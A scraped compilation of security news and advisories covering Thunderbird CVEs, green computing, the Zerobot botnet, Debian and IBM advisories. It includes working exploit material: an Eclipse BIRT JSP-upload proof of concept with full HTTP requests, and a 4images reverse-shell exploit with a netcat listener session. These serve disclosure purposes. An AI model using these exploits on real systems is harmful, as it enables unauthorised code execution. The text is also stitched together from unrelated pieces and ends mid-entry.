When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification. This vulnerability affects Firefox < 98, Firefox ESR < 91.7, and Thunderbird < 91.7.

**Mozilla Foundation Security Advisory 2022-12**

Announced

March 8, 2022

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.7

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2022-26383: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification.

**References**

*   Bug 1742421

**#CVE-2022-26384: iframe allow-scripts sandbox bypass**

Reporter

Ed McManus

Impact

high

**Description**

If an attacker could control the contents of an iframe sandboxed with allow-popups but not allow-scripts, they were able to craft a link that, when clicked, would lead to JavaScript execution in violation of the sandbox.

**References**

*   Bug 1744352

**#CVE-2022-26387: Time-of-check time-of-use bug when verifying add-on signatures**

Reporter

Armin Ebert

Impact

high

**Description**

When installing an add-on, Thunderbird verified the signature before prompting the user; but while the user was confirming the prompt, the underlying add-on file could have been modified and Thunderbird would not have noticed.

**References**

*   Bug 1752979

**#CVE-2022-26381: Use-after-free in text reflows**

Reporter

Mozilla Fuzzing Team and Hossein Lotfi of Trend Micro Zero Day Initiative

Impact

high

**Description**

An attacker could have caused a use-after-free by forcing a text reflow in an SVG object leading to a potentially exploitable crash.

**References**

*   Bug 1736243

**#CVE-2022-26386: Temporary files downloaded to /tmp and accessible by other local users**

Reporter

attila

Impact

low

**Description**

Previously Thunderbird for macOS and Linux would download temporary files to a user-specific directory in /tmp, but this behavior was changed to download them to /tmp where they could be affected by other local users. This behavior was reverted to the original, user-specific directory.  
_This bug only affects Thunderbird for macOS and Linux. Other operating systems are unaffected._

**References**

*   Bug 1752396

CVE-2022-26383: Security Vulnerabilities fixed in Thunderbird 91.7

Less is often more when it comes to both infosec and eco-friendly computing practices

Adam Bannister 22 December 2022 at 15:35 UTC  
Updated: 22 December 2022 at 15:42 UTC

Less is often more when it comes to both infosec and eco-friendly computing practices

Reducing the carbon footprint of computing architecture could play a role not just in tackling climate change but another growing, borderless threat too – cyber-attacks.

That’s according to co-authors of a white paper that highlights how best practices for making cloud infrastructure secure and sustainable sometimes happily overlap with the common pursuit of efficiencies.

“The lowest hanging fruit for sustainability is to do less and save less data, which should also reduce attack surfaces,” Anne Currie, co-author of draft paper ‘The State of Green Cloud Software Practices’ and community chair at Green Software Foundation, told The Daily Swig.

Read more of the latest news about secure development

Fellow co-author Paul Johnston, founder of UK tech consultancy Roundabout Labs and former senior developer advocate for serverless at Amazon Web Services (AWS), echoes these sentiments.

“My take is that generally, greener means fewer lines of code and that means smaller attack surface,” he told The Daily Swig. Johnston said this also means “better use of managed services which, again, generally means that your attack surface is reduced (services tend to be better for infosec)”.

Shutting down defunct applications and services has the same effect. “Unmaintained, zombie, workloads are bad for the environment as well as being a security risk,” reads the white paper, which also has contributors from Red Hat, Microsoft, and the Green Web Foundation.

**Memory-safe languages**

Developers are urged to “rewrite code to use a more lightweight framework or language. Moving from Python to Rust could result in a 10-fold cut in CPU requirements, for example,” says the white paper. This could have security benefits insofar as Rust is, unlike Python, memory safe by default.

The white paper also endorses Golang as “an efficient language and easier than the classic HPC options of C or C++”.

Again, there is some positive correlation here with security best practices given the US National Security Agency (NSA) recently urged (PDF) organizations to abandon languages lacking “inherent memory protection, such as C/C++”, in favor of memory-safe alternatives like Golang, C#, Java, Ruby, and Swift.

Indeed, C and C++ have been blamed for the fact 70% of Microsoft and Google Chrome flaws are memory safety vulnerabilities.

Rust is seen as considerably more energy-efficient than Python

**Security and C, C++**

However, it’s perhaps reductive to conclude that ‘lightweight’ languages – generally defined in terms of syntax, memory footprint, and implementation complexity – are inherently more secure or sustainable in every context.

After all, it’s perfectly possible to write a super-efficient, ‘green’ program in C++, but this is obviously contingent on the developer’s aptitude.

“Vulnerabilities are less likely if the language constructs make it so the easy or obvious way either can’t or is unlikely to be a vulnerability,” David A Wheeler, director of open source supply chain security at the Linux Foundation, told The Daily Swig.

DON’T MISS ‘We don’t teach developers how to write secure software’: David A Wheeler on reversing CVE surge

“C is a relatively simple programming language in the sense that it has relatively few constructs; in that view, it’s lightweight. However, many operations in C (array deference, pointer assignment, or dereference, etc) provide no automatic protections, so any mistake can quickly lead to a vulnerability.

“In contrast, C++ is a much larger and more complex language than C,” continued Wheeler. “In at least some measures it wouldn’t be considered lightweight. However, its lack of many safety mechanisms by default leads to the same problems.”

**Managed cloud services**

Managed cloud services are also endorsed by the sustainable computing white paper because, among other things, they offer high compute density and autoscaling via serverless services.

Yet some enterprises are still nervous about moving data security into shared environments. Ann Currie, a software engineer as well as sci-fi author, considers these fears completely unjustified.

“The cloud puts way more effort into infosec than companies,” says Currie. “It’s a classic area where specialists kick the butt of the (usually) generalists in enterprises.”

Nevertheless, Paul Johnston warns that delegating security functions does create risks.

Catch up with the latest articles about security best practices

“The benefits of a ‘greener’ approach (even if unintentional) are very positive from an infosec view,” he explains.

“However, there is a possible downside in that the security side that you resolve by using managed services or by reducing code can then lead to an element of complacency about the elements that are often a little more complicated.”

The white paper also recommends “moving more work to the client or edge”, which generates security challenges, albeit solvable ones, by extending the attack surface beyond the data center.

Another sustainability goal is surely an unequivocal plus for security. Currie, Johnston, and their fellow co-authors envisage a future where firmware remains backwards-compatible with devices that are at least 10 years old – keeping users protected by security patches for longer.

**Eco incentives**

Compliance and shareholder pressures plus lower running costs surely persuaded tech giants like Microsoft to set ambitious targets for becoming fully carbon neutral or even carbon negative.

Nevertheless, Currie suspects the potentially dire reputational and financial costs of neglecting cybersecurity are an even stronger incentive for change.

“Getting sustainability to the top of the priority list is harder than getting security there,” she says. “The good news is cloud managed services are usually fairly sustainable and secure.”

In other words: anyone trying to persuade organizations to make their computing practices greener would be wise to flag any incidental security benefits when doing so.

RECOMMENDED Deserialized WebSec roundup – Fortinet, Citrix bugs; another Uber breach; hacking NFTs

Lean, green coding machine: How sustainable computing drive can reduce attack surfaces

Threat actors continue to evolve the malicious botnet, which has also added a list of new vulnerabilities it can use to target devices.

A recently discovered botnet that attacks organizations through Internet of things (IoT) vulnerabilities has added brute-forcing and distributed denial-of-service (DDoS) attack vectors, as well as the ability to exploit new flaws to its growing arsenal, Microsoft security analysts have found. 

The updates to Zerobot, a malware first observed earlier this month by Fortinet researchers, pave the way for more advanced attacks as the threat continues to evolve, according to the Microsoft Security Threat Intelligence Center (MSTIC).

MSTIC revealed in a blog post on Dec. 21 that the threat actors have updated Zerobot to version 1.1, which can now target resources through DDoS and make them inaccessible, widening the possibilities for attack and further compromise.

"Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations," the researchers wrote in the post. "In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target."

**Brute-Forcing and Other Tactics**

Fortinet researchers already had tracked two previous versions of Zerobot — one that was quite basic and another that was more advanced. The botnet's principal mode of attack originally was to target various IoT devices — including products from D-Link, Huawei, RealTek, TOTOLink, Zyxel, and more — through flaws found in those devices, and then spread to other assets connected on the network that way to propagate the malware and grow the botnet.

Microsoft researchers now have observed the botnet getting more aggressive in its attacks on devices, using a new brute-force vector to compromise weakly secured IoT devices rather than just trying to leverage a known vulnerability, the researchers revealed.

"IoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors," they wrote in the post. "Zerobot is capable of propagating through brute-force attacks on vulnerable devices with insecure configurations that use default or weak credentials."

The malware attempts to to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices, the researchers wrote. In their observations alone, the MSTIC team identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.

**An Expanded Security Vulnerability Exploit List**

Zerobot hasn't abandoned its original way to access devices, however, and has even expanded this practice. Prior to its new version, Zerobot already could exploit more than 20 flaws in assorted devices, including routers, webcams, network-attached storage, firewalls, and other products from a host of well-known manufacturers.

The botnet has now added seven new exploits for flaws to its quiver, found in Apache, Roxy-WI, Grandstream, and other platforms, the researchers found.

MSTIC also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers, they added.

**Zerobot's Post-Compromise Behavior**

Researchers also observed more about Zerobot's behavior once it gains device access. For one, it immediately injects a malicious payload — which may be a generic script called "zero.sh" that downloads and attempts to execute the bot, or a script that downloads the Zerobot binary of a specific architecture, they said.

"The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds," the researchers wrote.

Once Zerobot achieves persistence, it scans for other devices exposed to the Internet that it can infect, by randomly generating a number between 0 and 255 and scanning all IPs starting with this value.

"Using a function called _new\_botnet\_selfRepo\_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources," the Microsoft researchers wrote. "This function includes 61 IP subnets, preventing scanning of these IPs."

Zerobot 1.1 uses scripts targeting various architectures, including ARM64, MIPS, and x86\_64. The researchers also have observed samples of the botnet on Windows and Linux devices, exhibiting different persistence methods based on the OS.

**Protecting the Enterprise**

Fortinet researchers already had stressed the importance of organizations immediately updating to the latest versions of any devices affected by Zerobot. Given that businesses are losing up to $250 million a year on unwanted botnet attacks, according to a report published last year from Netacea, the danger is real.

To help identify if an organization is vulnerable, Microsoft researchers included an updated list of CVEs that Zerobot can exploit in their post. The MSTIC team also recommended that organizations use security solutions with cross-domain visibility and detection capabilities to detect Zerobot malware variants and malicious behavior related to the threat.

Enterprises should also adopt a comprehensive IoT security solution that allows for visibility and monitoring of all IoT and operational technology (OT) devices, threat detection and response, and integration with SIEM/SOAR and extended detection and response (XDR) platforms, according to Microsoft.

As part of this strategy, they should ensure secure configurations for devices by changing default passwords to strong ones and blocking SSH from external access, as well as use least-privileges access including VPN service for remote access, the researchers said.

Another way to avoid compromise by Zerobot is to harden endpoints with a comprehensive security solution that manages the apps that employees can use and provides application control for unmanaged solutions, they said. This solution also should perform timely cleanup of unused and stale executables sitting on an organization's devices.

Zerobot Adds Brute Force, DDoS to Its IoT Attack Arsenal

The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network.
Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters.
Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,

Internet of Things / Patch Management

The **Zerobot** DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network.

Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters.

Zerobot, first documented by Fortinet FortiGuard Labs earlier this month, is a Go-based malware that propagates through vulnerabilities in web applications and IoT devices like firewalls, routers, and cameras.

"The most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities," Microsoft researchers said.

Also called ZeroStresser by its operators, the malware is offered as a DDoS-for-hire service to other criminal actors, with the botnet advertised on social media by its operators.

Microsoft said that one domain with connections to Zerobot – zerostresser\[.\]com – was among the 48 domains that were seized by the U.S. Federal Bureau of Investigation (FBI) this month for offering DDoS attack features to paying customers.

The latest version of Zerobot spotted by Microsoft not only targets unpatched and improperly secured devices, but also attempts to brute-force over SSH and Telnet on ports 23 and 2323 for spreading to other hosts.

The list of newly added known flaws exploited by Zerobot 1.1 is as follows -

*   **CVE-2017-17105** (CVSS score: 9.8) - A command injection vulnerability in Zivif PR115-204-P-RS
*   **CVE-2019-10655** (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability in Grandstream GAC2500, GXP2200, GVC3202, GXV3275, and GXV3240
*   **CVE-2020-25223** (CVSS score: 9.8) - A remote code execution vulnerability in the WebAdmin of Sophos SG UTM
*   **CVE-2021-42013** (CVSS score: 9.8) - A remote code execution vulnerability in Apache HTTP Server
*   **CVE-2022-31137** (CVSS score: 9.8) - A remote code execution vulnerability in Roxy-WI
*   **CVE-2022-33891** (CVSS score: 8.8) - An unauthenticated command injection vulnerability in Apache Spark
*   **ZSL-2022-5717** (CVSS score: N/A) - A remote root command injection vulnerability in MiniDVBLinux

Upon successful infection, the attacks chain proceeds to download a binary named "zero" for a specific CPU architecture that enables it to self-propagate to more susceptible systems exposed online.

Additionally, Zerobot is said to proliferate by scanning and compromising devices with known vulnerabilities that are not included in the malware executable, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.

Zerobot 1.1 further incorporates seven new DDoS attack methods by making use of protocols such as UDP, ICMP, and TCP, indicating "continuous evolution and rapid addition of new capabilities."

"The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks," the tech giant said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

cryptmount Filesystem Manager 6.1.1

Eclipse Business Intelligence Reporting Tool versions 4.11.0 and below suffer from a bypass vulnerability that allows for remote code execution.

SEC Consult Vulnerability Lab Security Advisory < 20221216-0 >  
=======================================================================  
               title: Remote code execution - CVE-2021-34427 bypass  
             product: Eclipse Business Intelligence Reporting Tool (BiRT)  
  vulnerable version: <= 4.11.0  
       fixed version: 4.12  
          CVE number: CVE-2021-34427  
              impact: High  
            homepage: https://eclipse.github.io/birt-website/  
               found: 2022-10-05  
                  by: Armin Stock (Atos)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"With BIRT you can create data visualizations, dashboards and reports  
that can be embedded into web applications and rich clients. Make information out  
of your data!"

https://eclipse.github.io/birt-website/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Remote code execution - CVE-2021-34427 bypass  
The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)  
allows an attacker to execute code on the server, by creating a `.jsp` file  
with the `BiRT - WebViewerExample`. This was fixed with the following code:

-------------------------------------------------------------------------------  
// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081  
  protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {  
    int extIndex = rptDocumentName.lastIndexOf(".");  
    String extension = null;  
    boolean validExtension = true;

    if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {  
      extension = rptDocumentName.substring(extIndex + 1);

      if (!disallowedExtensionsForRptDocument.isEmpty()  
          && disallowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!validExtension) {  
        throw new ViewerException(BirtResources.getMessage(  
            ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));  
      }

    }  
  }  
-------------------------------------------------------------------------------

This fix can be easily bypassed by adding `/.` to the filename which allows  
an attacker to execute arbitrary code.

Proof of concept:  
-----------------  
1) Remote code execution - CVE-2021-34427 bypass  
The old exploit results in an error message:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1  
-------------------------------------------------------------------------------

Response:  
-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 06:14:54 GMT  
Connection: close  
Content-Length: 4644

<html>  
<head>  
<title>Error</title>  
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>  
</head>  
<body>  
<div id="birt_errorPage" style="color:red">  
<span id="error_icon"  style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- ';   
document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > +   
</span>

Invalid extension - "jsp" for the __document parameter.  
-------------------------------------------------------------------------------

But adding `/.` to the end of the filename creates the file on the server as  
before:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 05:26:01 GMT  
Connection: close  
Content-Length: 283

<html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head>  
<body style="background-color: #ECE9D8;">  
<div style="font-size:10pt;"><font color="black">  
The report document file has been generated successfully.</font>  
</div></body></html>  
-------------------------------------------------------------------------------

This allows the execution of the provided `JSP` code, by calling  
`/birt/test/info-new.jsp`.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested, but all versions <= 4.11 are vulnerable.  
* 4.10.0 (2022-10-01)

Vendor contact timeline:  
------------------------  
2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)  
2022-11-17: Vendor confirmed the bypass and is working on a fix.  
2022-11-17: Vendor provided a fix.  
2022-11-27: The fix was tested and could be bypassed again.  
2022-11-27: Vendor acknowledged the bypass and provided a new fix.  
2022-11-28: The fix was tested and we were not able to bypass it.  
2022-11-30: Vendor releases patched version 4.12  
2022-12-16: Public release of security advisory.

Solution:  
---------  
Update Eclipse BIRT to version 4.12 or newer from the vendor's website:  
https://projects.eclipse.org/projects/technology.birt/releases/4.12.0

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Armin Stock / @2022

Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution

4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

4images 1.9 Remote Command Execution

Debian Linux Security Advisory 5305-1 - An integer overflow flaw was discovered in the CRL signature parser in libksba, an X.509 and CMS support library, which could result in denial of service or the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5305-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 21, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libksbaCVE ID         : CVE-2022-47629An integer overflow flaw was discovered in the CRL signature parser inlibksba, an X.509 and CMS support library, which could result in denialof service or the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 1.5.0-3+deb11u2.We recommend that you upgrade your libksba packages.For the detailed security status of libksba please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libksbaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOjfbNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TZeA/+NmgALkjZhrkd2BixzJp2eAe5ocLW5B0g9lB93NIyUORM2A3CgX0MsF+UbYrehbBdQosJOMko5E4St7ETC6H4eVknHj+snuP0j0MY/KQspoTTZfE/28y28734oXiBTuaOmEItHWlpuvreTPOzeNaWck/osiSLaBIWCKooGDnpUrTYAV+AQ7l8pyBU7iaZfOV1hR+ndTYdp/JK1Rl0FgPazCe4UQP1EAhMOE8XqVNKZ/MSh2U5JaSPUzTt+sgJWunB9ysBHbSuKFJ1cli7nqFf8urDmKYYU4gZtKFl4AJV0Oe39UTxjOwQkVhz8buLUVwLtXfSxu8jBTQXGLuwQJrr9W1S5mny3wxMgOOqNozdyoFuYNoIFY4+84dTG4H+L0sWbFCWVHY8gCKwPSa6ZK0eP4UQ9dxgmUfK5K6Ldo8gi0iX1v1Ub3OYz7JzeIfkUKTx82yLmFcFisQNgeXe6lMN+Tzu7WTs3w8Y3OA7a65nKb79PDJFZ/Hiw+p06L+C7SkhfcItMbKwqU3IdfsVrGxTK4VbdYZEoMv0+43zBypLDUF+eVC4E3MJSB0k+qAiyLzr6qbaVZp4m04/B2puqnBACIIc3Vm9BUKQCWYx4R6C8rqfxtOfD2Xmz4xGcNZfr342Kig4QNbkc1zatx72maEX1KGt2x9BmqtSvebuw/EwkBQ=9jlL-----END PGP SIGNATURE-----

Debian Security Advisory 5305-1

Debian Linux Security Advisory 5304-1 - Jan-Niklas Sohn discovered several vulnerabilities in X server extensions in the X.Org X server, which may result in privilege escalation if the X server is running privileged.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5304-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 20, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2022-4283 CVE-2022-46340 CVE-2022-46341 CVE-2022-46342  
                 CVE-2022-46343 CVE-2022-46344  
Debian Bug     : 1026071

Jan-Niklas Sohn discovered several vulnerabilities in X server extensions  
in the X.Org X server, which may result in privilege escalation if the X  
server is running privileged.

For the stable distribution (bullseye), these problems have been fixed in  
version 2:1.20.11-1+deb11u4.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOiEgFfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qysw//b3WxFj6Bvmix6MNP/D/izMHimLJrgWZthnCpgFIQxwpNrho3YexS3dkh  
nfFIv6FKkFHoWvDDkURee2AROshngIgcl0/yrlouV9gaR0ZtVCI//Ku9t5hTatTd  
/fC9AlIq/s9zgeslq8RzDwhcbQQtT4M0aqQbCt5V9pJGPJ5WTWp9l0D/KVkkiIfU  
6CIJn1xvw6Nu/3m9BWG0VrHP83jTVJi6KhGfFAZkYhTsfw/TOfLUN5nZnQFnNvrR  
+XwruR3Zy1ZA5pStWPVuuGQwi0xuhy3weiz92mGUhRsavw4SrJsL54k+gg5Su2lW  
dzgiRVpjERtbLKXSQxin1nMM3LUePxnFvHwmTaC00XUL2YCLuCECl7NDMIncjJiF  
+rYEEUtAvPOjIC4bvt3KUDfj3pf37/YqhEXgauqc0Gm3irAM/gkxypSszEeYaxne  
7THA+DYh3fnrpZA1tGyCzS4gUPLaxsGU/cRej9ES57rKyZY9n/gdO6r6sPybgZIL  
lRGOt2Unl3eIgMkrH2THLg0v/Rume5Gi4demI5GAoxOw4r500jU+X+/BZLd09pyC  
lhtDUFfcaf7J/LyT/EM98M/mAp4iCq4lFuZbCxoGyip/HsaPtWb4EQw9mVzkAByM  
BnwC/La8g0z0n/b/eMNM2hd7BajKH4uobmvfRicyCc5YG3CrE10Èpj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5304-1

IBM Security Guardium 11.4 could allow a privileged user to obtain sensitive information inside of an HTTP response. IBM X-Force ID: 235405.

  

**Summary**

IBM Security Guardium has addressed these vulnerabilities \[CVE-2022-39166, CVE-2022-34917, CVE-2022-42889\]

**Vulnerability Details**

**CVEID:**   CVE-2022-39166  
**DESCRIPTION:**   IBM Security Guardium could allow a privileged user to obtain sensitive information inside of an HTTP response.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235405 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-34917  
**DESCRIPTION:**   Apache Kafka is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to allocate large amounts of memory on brokers, and results in a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236498 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-42889  
